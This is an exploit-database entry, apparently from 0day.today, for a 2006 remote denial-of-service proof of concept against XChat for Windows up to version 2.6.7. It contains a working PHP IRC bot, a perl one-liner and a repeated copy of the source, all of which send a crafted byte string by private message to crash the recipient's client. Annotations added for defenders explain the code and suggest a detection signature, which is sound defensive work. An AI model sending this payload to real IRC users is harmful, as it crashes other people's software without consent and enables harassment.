XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)
2006-08-07T00:00:00
ID 1337DAY-ID-6181 Type zdt Reporter ratboy Modified 2006-08-07T00:00:00
Description
Exploit for unknown platform in category dos / poc
===================================================================
XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)
===================================================================
<?
# another way to test this with irssi/bitchx <below> /str0ke
# /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"'
?>
<?php
// XChat <= 2.6.7 Windows Remote Crash DoS by ratboy
// Tested on Windows SP1/SP2 (the author gives no further platform detail).
//
// Purpose: proof-of-concept IRC bot. It connects to an IRC server, joins a channel,
// waits for the first PRIVMSG it sees, sends one private message containing the
// byte string in EXPLOIT to the nick in VICTIM, and then closes the socket.
//
// Reviewer notes for defenders:
// - The trigger is a single PRIVMSG line, so any IRC peer able to message an
//   affected client can deliver it. Per the title, affected builds are XChat for
//   Windows up to and including 2.6.7.
// - NOTE(review): the page does not state the root cause. The payload is mostly a run
//   of 4-byte UTF-8-shaped sequences (lead bytes 0xF0-0xF2), which suggests a fault in
//   text decoding or rendering. Confirm against the vendor changelog or advisory.
// - A detection signature can match this byte run inside PRIVMSG text. The fix is
//   moving clients off the affected versions.

// Disable PHP's execution time limit so the read loop can block indefinitely.
set_time_limit(0);
// Connection and target settings. All values are hard-coded by the author.
// VICTIM matches the reporter's own handle, so this is presumably a self-test setup.
define("SERVER", 'irc.enigmagroup.org');
define("PORT", 6667);
define("CHANNEL", "#enigmagroup"); //Set the channel the bot will join here
define("NICK", "ratbot"); //Set the bot's nick here
// Crash-trigger bytes. "\x9x" is not a two-digit hex escape: PHP reads it as "\x9"
// (byte 0x09) followed by a literal 'x'. Presumably a typo in the original; the same
// string appears in the irssi/bitchx one-liner above this script.
define("EXPLOIT", "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82");
define("VICTIM", "ratboy");
// None of the socket_* return values below are checked. $fp only holds the boolean
// result of socket_connect() and is never read again.
$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket
$fp = socket_connect($socket, SERVER, PORT); // Connect to the server
// Minimal IRC registration: USER, NICK, then JOIN, sent without waiting for replies.
socket_write($socket,"USER ratboy ratboy ratboy :ratboy\r\n"); // Send the Username to the server
socket_write($socket,"NICK ".NICK." \r\n"); // Change our nickname
socket_write($socket,"JOIN ".CHANNEL." \r\n"); // Join the channel
// Read up to 2046 bytes per iteration. '@' hides read warnings, and a false or empty
// read ends the loop.
while($data = @socket_read($socket,2046)) { //read the data
echo $data;
// Split the raw buffer on spaces. $cmd[1] is the second token, which is the command
// name when the buffer starts with a ":prefix COMMAND ..." line.
$cmd = explode(" ", $data);
// Keep-alive: answer a server PING with everything after the 6-character "PING :"
// prefix. This only matches when PING sits at the very start of the buffer.
if (strpos($data, "PING :")===0) {
socket_write($socket, "PONG :".substr($data, 6)."\r\n");
continue;
}
if($cmd[1] == "PRIVMSG"){ // Send the exploit right when the channel gets a message then stop the bot
socket_write($socket, "PRIVMSG ".VICTIM." :".EXPLOIT."\r\n");
// The loop is not exited explicitly. It ends when the next socket_read() on the
// closed socket fails (warning hidden by '@').
socket_close($socket);
}
}
?>
{"id": "1337DAY-ID-6181", "type": "zdt", "bulletinFamily": "exploit", "title": "XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)", "description": "Exploit for unknown platform in category dos / poc", "published": "2006-08-07T00:00:00", "modified": "2006-08-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6181", "reporter": "ratboy", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-05T23:31:15", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/6181", "sourceData": "===================================================================\r\nXChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)\r\n===================================================================\r\n\r\n\r\n\r\n\r\n<?\r\n # another way to test this with irssi/bitchx <below> /str0ke\r\n # /exec -o perl -e 'print \"\\x9x\\xF0\\x92\\x8D\\x85\\xF1\\xA5\\x90\\xB4\\xF1\\x96\\x9E\\x85\\xF1\\xA6\\x8D\\xA5\\xF1\\xB8\\xA5\\x85\\xF1\\xA7\\x95\\xA8\\x29\\xF2\\x95\\x95\\x82\"'\r\n ?>\r\n\r\n<?php\r\n// XChat <= 2.6.7 Windows Remote Crash DoS by ratboy\r\n// Tested on Windows SP1/SP2 \r\n// The following bug was tested on the XChat <= 2.6.7 on Windows SP1/SP2 \r\n\r\n//Stop the script timing out\r\nset_time_limit(0);\r\n\r\n//Set constants\r\ndefine(\"SERVER\", 'irc.enigmagroup.org');\r\ndefine(\"PORT\", 6667);\r\ndefine(\"CHANNEL\", \"#enigmagroup\"); //Set the channel the bot will join here\r\ndefine(\"NICK\", \"ratbot\"); //Set the bot's nick here\r\ndefine(\"EXPLOIT\", \"\\x9x\\xF0\\x92\\x8D\\x85\\xF1\\xA5\\x90\\xB4\\xF1\\x96\\x9E\\x85\\xF1\\xA6\\x8D\\xA5\\xF1\\xB8\\xA5\\x85\\xF1\\xA7\\x95\\xA8\\x29\\xF2\\x95\\x95\\x82\");\r\ndefine(\"VICTIM\", \"ratboy\");\r\n\r\n$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // 
Create the Socket\r\n$fp = socket_connect($socket, SERVER, PORT); // Connect to the server\r\nsocket_write($socket,\"USER ratboy ratboy ratboy :ratboy\\r\\n\"); // Send the Username to the server\r\nsocket_write($socket,\"NICK \".NICK.\" \\r\\n\"); // Change our nickname\r\nsocket_write($socket,\"JOIN \".CHANNEL.\" \\r\\n\"); // Join the channel\r\nwhile($data = @socket_read($socket,2046)) { //read the data\r\n echo $data;\r\n $cmd = explode(\" \", $data);\r\n\r\n if (strpos($data, \"PING :\")===0) {\r\n socket_write($socket, \"PONG :\".substr($data, 6).\"\\r\\n\");\r\n continue;\r\n }\r\n \r\n if($cmd[1] == \"PRIVMSG\"){ // Send the exploit right when the channel gets a message then stop the bot\r\n socket_write($socket, \"PRIVMSG \".VICTIM.\" :\".EXPLOIT.\"\\r\\n\");\r\n socket_close($socket);\r\n }\r\n}\r\n\r\n?> \r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "_state": {"dependencies": 1647628850}}